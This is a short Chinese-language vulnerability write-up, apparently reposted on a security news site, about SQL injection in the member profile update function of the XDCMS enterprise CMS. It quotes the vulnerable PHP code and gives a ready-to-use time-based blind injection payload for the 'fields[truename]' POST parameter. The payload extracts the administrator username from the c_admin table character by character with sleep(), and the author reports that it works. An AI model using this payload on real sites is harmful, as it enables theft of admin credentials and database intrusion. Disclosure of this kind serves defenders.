XDCMS企业管理系统SQL #3

没穿底裤 2020年1月1日05:06:05评论514 views字数 668阅读2分13秒阅读模式
摘要

[php]
public function edit_save(){$this->member_info();$userid=intval(Cookie::_getcookie('member_userid'));


漏洞作者: roker

[php]
public function edit_save(){

$this->member_info();

$userid=intval(Cookie::_getcookie('member_userid'));

$fields=$_POST['fields'];

//�޸�����

$field_sql='';

foreach($fields as $k=>$v){

$f_value=$v;

if(is_array($v)){

$f_value=implode(',',$v);

}

$field_sql.=",`{$k}`='".safe_html($f_value)."'";

}

$field_sql=substr($field_sql,1);

$field_sql="update ".DB_PRE."member set {$field_sql} where userid={$userid}";

$query=$this->mysql->query($field_sql);

 

showmsg(C('update_success'),'index.php?m=member&f=edit');

}
[/php]
只是 safe_html gpc关闭或者php高版本的话,单引号还是可以进去的。 过滤了很多,加上是 updata 。所以盲注延时。

修改抓包修改

fields%5Btruename%5D=a' or if(ascii(substr((select username from c_admin),1,1))-96,sleep(2),null) or '1

延时是成功的

XDCMS企业管理系统SQL #3

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日05:06:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XDCMS企业管理系统SQL #3https://cn-sec.com/archives/75665.html

发表评论

匿名网友 填写信息